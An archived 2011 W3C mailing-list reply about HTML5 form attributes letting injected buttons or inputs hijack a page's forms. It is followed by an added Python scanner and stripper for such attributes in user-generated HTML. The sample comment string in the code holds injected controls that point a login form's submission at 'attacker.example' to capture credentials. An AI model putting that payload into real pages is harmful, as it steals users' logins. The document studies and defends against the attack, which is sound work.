
Re: [html5] Input attributes allow form tampering

From: Ian Hickson <ian@hixie.ch>
Date: Thu, 4 Aug 2011 16:18:29 +0000 (UTC)
To: Philippe De Ryck <philippe.deryck@cs.kuleuven.be>
cc: public-html-comments@w3.org, Giles Hogben <Giles.Hogben@enisa.europa.eu>, Lieven Desmet <Lieven.Desmet@cs.kuleuven.be>
Message-ID: <Pine.LNX.4.64.1108041608500.14637@ps20323.dreamhostps.com>
On Thu, 4 Aug 2011, Philippe De Ryck wrote:
> > 
> > I always hesitate to minimise the risk in security risk assessments, 
> > but this does seem somewhat convoluted. Are you aware of any page that 
> > has such a form, accepts user input, and uses a blacklist rather than 
> > whitelist, and allows <button> or <input> to be inserted unescaped but 
> > not <script>?
> Your requirements for a successful attack are rather strict, since the 
> absence of a script injection attack does not seem necessary. A site 
> vulnerable to injection attacks can still be protected against XSS by 
> additional countermeasures (e.g. NoScript), yet remain vulnerable to 
> this issue.

NoScript is a client-side counter-measure used by a minority of users. If 
a site is relying on NoScript to not be vulnerable, then that site has 
lost already.

Thus I do not think that the described conditions are unduly strict.

> If you leave these requirements out, you only need a page with a form 
> and displayed user content, which is vulnerable to an HTML/script 
> injection attack. Concrete example sites are any site with 
> user-generated content (blogs, newspapers with comments, wikis) and a 
> login form (which is often autocompleted by the browser). Tempting the 
> user to click an injected button with "Some really tempting name or 
> image" should be fairly easy.

Once you have a page where this is possible, sure. I'm just not convinced 
that there are pages that allow form controls but aren't already 
vulnerable to some other equal or worse problem.

Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
Received on Thursday, 4 August 2011 16:19:00 UTC
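The scenario discussed in the thread above is a page that strips `<script>` from user-generated content but lets `<button>` or `<input>` through; the HTML5 `form` attribute then lets an injected control attach itself to an existing form on the page (such as an autocompleted login form), and `formaction`, `formmethod`, `formtarget` and `formenctype` let it redirect where and how that form is submitted. The following is an added example, not code from the thread or from the W3C: a server-side check using Python's standard-library `html.parser` that flags such controls in user-supplied markup and strips the offending attributes. The site origin, the comment text and the `login` form id are constructed for the example; a real deployment would run this in addition to, not instead of, an element and attribute whitelist.

```python
"""Find and neutralise HTML5 form-override attributes in user-generated HTML (added example)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# HTML5 attributes on <button>/<input> that associate the control with a form
# outside its own ancestry, or override where and how that form is submitted.
FORM_OVERRIDE_ATTRS = frozenset(
    {"form", "formaction", "formmethod", "formenctype", "formtarget", "formnovalidate"}
)
SUBMIT_CONTROLS = ("button", "input")


class FormOverrideScanner(HTMLParser):
    """Report every <button>/<input> that carries a form-override attribute."""

    def __init__(self, site_origin):
        super().__init__()
        self.site_origin = site_origin.rstrip("/").lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # also reached for <input .../> via handle_startendtag
        if tag not in SUBMIT_CONTROLS:
            return
        hits = {name: value for name, value in attrs if name in FORM_OVERRIDE_ATTRS}
        if not hits:
            return
        cross_origin = False
        target = hits.get("formaction")
        if target:
            parsed = urlparse(target.strip())
            # Anything with a scheme or host is treated as an absolute target and its
            # origin compared with the site's; relative paths stay on the site's origin.
            if parsed.scheme or parsed.netloc:
                cross_origin = f"{parsed.scheme}://{parsed.netloc}".lower() != self.site_origin
        self.findings.append(
            {"tag": tag, "line": self.getpos()[0], "attrs": hits, "cross_origin": cross_origin}
        )


def scan_user_html(html_text, site_origin):
    """Return a list of findings for user-supplied markup served from site_origin."""
    scanner = FormOverrideScanner(site_origin)
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


class FormOverrideStripper(HTMLParser):
    """Re-serialise markup with form-override attributes removed from submit controls.

    Character references are passed through untouched (convert_charrefs=False) so that
    already-escaped text such as &lt;script&gt; is not turned back into live markup.
    """

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.stripped = []

    def _serialise_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            if tag in SUBMIT_CONTROLS and name in FORM_OVERRIDE_ATTRS:
                self.stripped.append((tag, name, value))
                continue
            # HTMLParser hands back decoded attribute values, so re-escape them on output.
            kept.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        return (" " + " ".join(kept)) if kept else ""

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._serialise_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._serialise_attrs(tag, attrs)}/>")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")


def strip_form_overrides(html_text):
    """Return (cleaned_html, list of (tag, attr, value) removed)."""
    stripper = FormOverrideStripper()
    stripper.feed(html_text)
    stripper.close()
    return "".join(stripper.out), stripper.stripped


# Constructed sample: a blog comment that passed a tag blacklist (no <script>) but carries
# controls that attach themselves to the page's login form (assumed id="login").
SAMPLE_COMMENT = (
    "<p>Great article!</p>"
    '<button form="login" formaction="https://attacker.example/collect" formmethod="post">'
    "Claim your free gift</button>"
    '<input type="image" src="/gift.png" form="login" formaction="//attacker.example/collect">'
    '<input type="submit" formaction="/search" value="Search">'  # same-origin override, still flagged
)

if __name__ == "__main__":
    for f in scan_user_html(SAMPLE_COMMENT, "https://blog.example"):
        print(f"line {f['line']}: <{f['tag']}> {f['attrs']} cross_origin={f['cross_origin']}")
    clean, removed = strip_form_overrides(SAMPLE_COMMENT)
    print(clean)
    print(f"removed {len(removed)} attribute(s)")
```

The scanner is the part to wire into review or logging: a `cross_origin` finding on a control in user content is the case the thread describes, while a same-origin `formaction` still changes which endpoint receives the form and deserves a look. The stripper is deliberately narrow, so a site that already whitelists elements and attributes gains nothing from it; it is for the case the thread assumes, where `<button>` and `<input>` are allowed through a blacklist.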
